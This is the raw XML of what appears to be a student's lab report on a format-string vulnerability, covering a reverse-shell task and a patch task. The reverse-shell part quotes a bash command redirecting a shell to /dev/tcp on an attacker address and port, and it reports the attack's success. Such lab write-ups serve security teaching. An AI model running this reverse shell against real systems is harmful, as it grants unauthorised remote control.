          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58D1B5E4" w14:textId="54C1CD59" w:rsidR="00806826" w:rsidRDefault="00473BAF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7 </w:t>
      </w:r>
      <w:r w:rsidRPr="00473BAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Task 7: Getting a Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687496E7" w14:textId="3E12CAA8" w:rsidR="00D90797" w:rsidRDefault="006A4E4D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we already know our IP (we are local), we do not have to fetch it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F12A130" w14:textId="745A1335" w:rsidR="006A4E4D" w:rsidRDefault="006A4E4D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0A67A" wp14:editId="6059E95A">
            <wp:extent cx="3779517" cy="2362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500" cy="2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DF93" w14:textId="4210C5F1" w:rsidR="006A4E4D" w:rsidRDefault="006A4E4D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971029" wp14:editId="5D59C926">
            <wp:extent cx="4701947" cy="868755"/>
            <wp:effectExtent l="0" t="0" r="3810" b="762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7833" w14:textId="77777777" w:rsidR="006A4E4D" w:rsidRDefault="006A4E4D" w:rsidP="006A4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our server and begin listening on our attacking machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1886980D" w14:textId="39D19D83" w:rsidR="006A4E4D" w:rsidRDefault="006A4E4D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9F196" wp14:editId="2AF5FC02">
            <wp:extent cx="5913632" cy="70872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7AB0" w14:textId="41812AD4" w:rsidR="006A4E4D" w:rsidRDefault="006A4E4D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our input that we are feeding into the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1354DBEA" w14:textId="39854BC4" w:rsidR="006A4E4D" w:rsidRDefault="006A4E4D" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49B87B0A" w14:textId="6C172AE7" w:rsidR="006A4E4D" w:rsidRDefault="006A4E4D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DB3ED" wp14:editId="5094809F">
            <wp:extent cx="3429000" cy="2004060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54" name="Picture 5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, let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300" cy="20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C346" w14:textId="70B144CA" w:rsidR="006A4E4D" w:rsidRDefault="006A4E4D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mportant lin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d to change, it now attempts to execute “</w:t>
      </w:r>
      <w:r w:rsidRPr="006A4E4D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/bin/bash -c /bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A4E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A4E4D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A4E4D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6A4E4D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/10.0.2.6/7070 0&lt;&amp;1 2&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006A4E4D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5970698C" w14:textId="22ABCBAA" w:rsidR="006A4E4D" w:rsidRDefault="006A4E4D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705779" wp14:editId="45513CA1">
            <wp:extent cx="4633362" cy="883997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F8BF" w14:textId="4DD694A7" w:rsidR="006A4E4D" w:rsidRDefault="006A4E4D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what server reads, but did we get a reverse shell</w:t>
      </w:r>
      <w:r w:rsidR="00391495">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9D97B3" w14:textId="3C11AB2D" w:rsidR="00750B60" w:rsidRDefault="004E35BF" w:rsidP="00996C9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 w:rsidR="006A4E4D" w:rsidRPr="006A4E4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A4E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AB71F7" wp14:editId="0C3FE7BA">
            <wp:extent cx="4397121" cy="3071126"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="51" name="Picture 5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, let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B564" w14:textId="0E1C7BF4" w:rsidR="00391495" w:rsidRDefault="00391495" w:rsidP="00996C9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es, we did! There’s the ID to confirm that the attack succeeded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CBF9B5" w14:textId="06124E97" w:rsidR="00391495" w:rsidRDefault="00391495" w:rsidP="00996C9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* Yes, the addresses changed again and I’m sorry, I had to repeat this over again because my VM crashed and reset them, this assignment does not like me.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075DAEAE" w14:textId="77777777" w:rsidR="00391495" w:rsidRDefault="00391495" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="757C6169" w14:textId="69E4210B" w:rsidR="007C0438" w:rsidRDefault="007C0438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Pr="007C0438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Task 8: Fixing the Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD48B85" w14:textId="47F95611" w:rsidR="00C0222A" w:rsidRDefault="00C0222A" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4367A19E" w14:textId="657C9CE7" w:rsidR="00C0222A" w:rsidRDefault="00432B05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C270D" wp14:editId="3AAB0D89">
            <wp:extent cx="5913632" cy="4648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FE37" w14:textId="5DDFD322" w:rsidR="00432B05" w:rsidRDefault="00432B05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his warning is well warning of is that </w:t>
      </w:r>
      <w:r w:rsidR="00823276">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the parameter of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0082327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823276">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not really a string, it could in fact be anything,</w:t>
      </w:r>
      <w:r w:rsidR="00282E9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> so most things that are present on the stack could be manipulated if given the right input….</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683DAC04" w14:textId="0DB4B1AD" w:rsidR="007C0438" w:rsidRDefault="008F0DF6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4122EF" wp14:editId="12276E07">
            <wp:extent cx="2290082" cy="419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95163" cy="4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F6FD" w14:textId="5EE08AD3" w:rsidR="008F0DF6" w:rsidRDefault="008F0DF6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ing the vulnerable statement to this</w:t>
      </w:r>
      <w:r w:rsidR="000257CE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, basically patches the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673A9DF0" w14:textId="4EEA8AC3" w:rsidR="009E3542" w:rsidRDefault="009E3542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51963" wp14:editId="28689360">
            <wp:extent cx="2651758" cy="2209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031" cy="2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4038" w14:textId="76C5A790" w:rsidR="009E3542" w:rsidRDefault="009E3542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iling yields no warnings…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BA36C0" w14:textId="33D840DD" w:rsidR="00EF2B54" w:rsidRDefault="00EF2B54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E7C53D" wp14:editId="060A3628">
            <wp:extent cx="4793395" cy="838273"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="40" name="Picture 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308CC7" wp14:editId="161EBA28">
            <wp:extent cx="5943600" cy="755650"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"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2356" w14:textId="77A2FEAE" w:rsidR="00EF2B54" w:rsidRDefault="00EF2B54" w:rsidP="00996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oing task 5C yields nothing, so it is safe to say that this exploit is now squashed</w:t>
      </w:r>
      <w:r w:rsidR="00112D07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F54786E" w14:textId="77777777" w:rsidR="009E3542" w:rsidRDefault="009E3542" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E693AFE" w14:textId="4BFE61E7" w:rsidR="008E388D" w:rsidRPr="00473BAF" w:rsidRDefault="008E388D" w:rsidP="00996C91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="008E388D" w:rsidRPr="00473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911CD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="319A4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91"/>
    <w:rsid w:val="000257CE"/>
    <w:rsid w:val="00044455"/>
    <w:rsid w:val="0008524B"/>
    <w:rsid w:val="00097C49"/>
    <w:rsid w:val="000A597D"/>
    <w:rsid w:val="000B66F0"/>
    <w:rsid w:val="000E5E21"/>
    <w:rsid w:val="00112D07"/>
    <w:rsid w:val="00116742"/>
    <w:rsid w:val="00165145"/>
    <w:rsid w:val="00197165"/>
    <w:rsid w:val="001F3909"/>
    <w:rsid w:val="00201CE2"/>
    <w:rsid w:val="00280202"/>
    <w:rsid w:val="00282E9D"/>
    <w:rsid w:val="002D5D53"/>
    <w:rsid w:val="002E12F4"/>
    <w:rsid w:val="002F2B61"/>
    <w:rsid w:val="00310BFA"/>
    <w:rsid w:val="00312A56"/>
    <w:rsid w:val="00312BB3"/>
    <w:rsid w:val="003178D7"/>
    <w:rsid w:val="003617AF"/>
    <w:rsid w:val="00391495"/>
    <w:rsid w:val="003947E8"/>
    <w:rsid w:val="003A179B"/>
    <w:rsid w:val="003B649D"/>
    <w:rsid w:val="00432B05"/>
    <w:rsid w:val="00441E07"/>
    <w:rsid w:val="0045540B"/>
    <w:rsid w:val="0046318B"/>
    <w:rsid w:val="00473BAF"/>
    <w:rsid w:val="004740B9"/>
    <w:rsid w:val="00480DCC"/>
    <w:rsid w:val="004A2617"/>
    <w:rsid w:val="004B0FB4"/>
    <w:rsid w:val="004B7F52"/>
    <w:rsid w:val="004E35BF"/>
    <w:rsid w:val="00534E7F"/>
    <w:rsid w:val="005374EB"/>
    <w:rsid w:val="00546FDA"/>
    <w:rsid w:val="00565516"/>
    <w:rsid w:val="005931BA"/>
    <w:rsid w:val="005C283B"/>
    <w:rsid w:val="005C5386"/>
    <w:rsid w:val="005C7250"/>
    <w:rsid w:val="005D4893"/>
    <w:rsid w:val="005E1B73"/>
    <w:rsid w:val="005E23C2"/>
    <w:rsid w:val="00603C5E"/>
    <w:rsid w:val="006206E1"/>
    <w:rsid w:val="00636017"/>
    <w:rsid w:val="00653F6A"/>
    <w:rsid w:val="006724AA"/>
    <w:rsid w:val="006A265B"/>
    <w:rsid w:val="006A4E4D"/>
    <w:rsid w:val="006B292D"/>
    <w:rsid w:val="006D2FD7"/>
    <w:rsid w:val="006E46BB"/>
    <w:rsid w:val="007215D0"/>
    <w:rsid w:val="00750B60"/>
    <w:rsid w:val="00757869"/>
    <w:rsid w:val="007A3A63"/>
    <w:rsid w:val="007B0484"/>
    <w:rsid w:val="007B7ADF"/>
    <w:rsid w:val="007C0438"/>
    <w:rsid w:val="007C2E13"/>
    <w:rsid w:val="00806826"/>
    <w:rsid w:val="0081178F"/>
    <w:rsid w:val="00823276"/>
    <w:rsid w:val="0082658E"/>
    <w:rsid w:val="00873662"/>
    <w:rsid w:val="008B6BA0"/>
    <w:rsid w:val="008B6F2B"/>
    <w:rsid w:val="008C7769"/>
    <w:rsid w:val="008E388D"/>
    <w:rsid w:val="008F0DF6"/>
    <w:rsid w:val="00911DA3"/>
    <w:rsid w:val="00924E7C"/>
    <w:rsid w:val="009403CF"/>
    <w:rsid w:val="00963A76"/>
    <w:rsid w:val="0097333F"/>
    <w:rsid w:val="00996C91"/>
    <w:rsid w:val="009C0EA4"/>
    <w:rsid w:val="009C2D48"/>
    <w:rsid w:val="009C3ECA"/>
    <w:rsid w:val="009E3542"/>
    <w:rsid w:val="009E3B94"/>
    <w:rsid w:val="00A20E81"/>
    <w:rsid w:val="00A37D13"/>
    <w:rsid w:val="00A40264"/>
    <w:rsid w:val="00A648E9"/>
    <w:rsid w:val="00AB0B27"/>
    <w:rsid w:val="00AB285F"/>
    <w:rsid w:val="00AD2D27"/>
    <w:rsid w:val="00AD5A8A"/>
    <w:rsid w:val="00B03970"/>
    <w:rsid w:val="00B057DA"/>
    <w:rsid w:val="00B177D4"/>
    <w:rsid w:val="00B4701E"/>
    <w:rsid w:val="00BC17FD"/>
    <w:rsid w:val="00BE1266"/>
    <w:rsid w:val="00BE1F25"/>
    <w:rsid w:val="00BE64FC"/>
    <w:rsid w:val="00C0222A"/>
    <w:rsid w:val="00C03B55"/>
    <w:rsid w:val="00C06380"/>
    <w:rsid w:val="00C30FB5"/>
    <w:rsid w:val="00CA72D9"/>
    <w:rsid w:val="00CD176C"/>
    <w:rsid w:val="00CD2C28"/>
    <w:rsid w:val="00CD6D32"/>
    <w:rsid w:val="00D075B4"/>
    <w:rsid w:val="00D12E58"/>
    <w:rsid w:val="00D13D59"/>
    <w:rsid w:val="00D36902"/>
    <w:rsid w:val="00D50278"/>
    <w:rsid w:val="00D87BD4"/>
    <w:rsid w:val="00D90797"/>
    <w:rsid w:val="00D91E0A"/>
    <w:rsid w:val="00D947C0"/>
    <w:rsid w:val="00D96801"/>
    <w:rsid w:val="00DF6B7D"/>
    <w:rsid w:val="00E4556D"/>
    <w:rsid w:val="00E544A1"/>
    <w:rsid w:val="00E63CAF"/>
    <w:rsid w:val="00E65D76"/>
    <w:rsid w:val="00E72272"/>
    <w:rsid w:val="00E76BA6"/>
    <w:rsid w:val="00E95961"/>
    <w:rsid w:val="00E970AA"/>
    <w:rsid w:val="00EA322F"/>
    <w:rsid w:val="00EA3629"/>
    <w:rsid w:val="00EF2B54"/>
    <w:rsid w:val="00F259BC"/>
    <w:rsid w:val="00F76A4F"/>
    <w:rsid w:val="00FA1603"/>
    <w:rsid w:val="00FE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95833"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{450E1448-022D-46D2-B788-19DD070A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85AC40-2EF5-41BE-B617-718BA3B6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Hansen</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Austin Hansen</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-27T04:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-30T04:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>